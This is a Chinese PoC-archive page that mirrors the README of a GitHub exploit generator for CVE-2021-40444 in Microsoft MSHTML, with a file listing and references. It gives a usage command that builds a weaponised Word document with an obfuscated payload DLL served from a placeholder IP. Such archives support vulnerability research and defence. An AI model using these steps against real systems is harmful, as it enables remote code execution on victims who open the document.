支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: b3c68085a1bac9a6212e5ba00e1a9982cba55a53

来源
https://github.com/H0j3n/CVE-2021-40444
关联漏洞
标题:Microsoft MSHTML.DLL 路径遍历漏洞 (CVE-2021-40444)
Description:Microsoft MSHTML.DLL是美国微软(Microsoft)公司的一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 Microsoft MSHTML.DLL 存在路径遍历漏洞,远程攻击者可以创建带有恶意ActiveX控件的特制Office文档,诱使受害者打开文档并在系统上执行任意代码。
介绍
# CVE-2021-40444

## Usage

Ensure to run `setup.sh` first as you will need few directories. Once you have
run the script, you should be able to run `gen.py` with the example given:-

```python
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx 
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf 
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
```

## Notes

1. The location of `http.server` will be in `web` directory. This directory will
   have 3 files:-

- .cab
- .html
- .docx


### Without Verbose

![without_verbose](https://github.com/H0j3n/CVE-2021-40444/blob/main/src/without_verbose.png)

### With Verbose

![with_verbose](https://github.com/H0j3n/CVE-2021-40444/blob/main/src/with_verbose.png)

## Disclaimer

This repository is for educational purpose only and not intended to be used in
the wild for bad intention. Any illegal use of this repo is strictly at your own
responsibilty and risk.

## References

1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
3. https://github.com/klezVirus/CVE-2021-40444
4. https://github.com/lockedbyte/CVE-2021-40444
5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
11. https://blog.sunggwanchoi.com/remote-template-injection/
12. https://youtube.com/watch?v=dgdx3QqPCuA
13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution
文件快照

 [4.0K]  /data/pocs/b3c68085a1bac9a6212e5ba00e1a9982cba55a53
├── [4.0K]  document
│   ├── [ 14K]  document.docx
│   ├── [ 21K]  footer.docx
│   └── [ 21K]  header.docx
├── [9.3K]  gen.py
├── [4.0K]  html
│   └── [6.1K]  template.html
├── [2.4K]  README.md
├── [  52]  requirements.txt
├── [ 508]  setup.sh
└── [4.0K]  src
    ├── [137K]  without_verbose.png
    └── [439K]  with_verbose.png

3 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。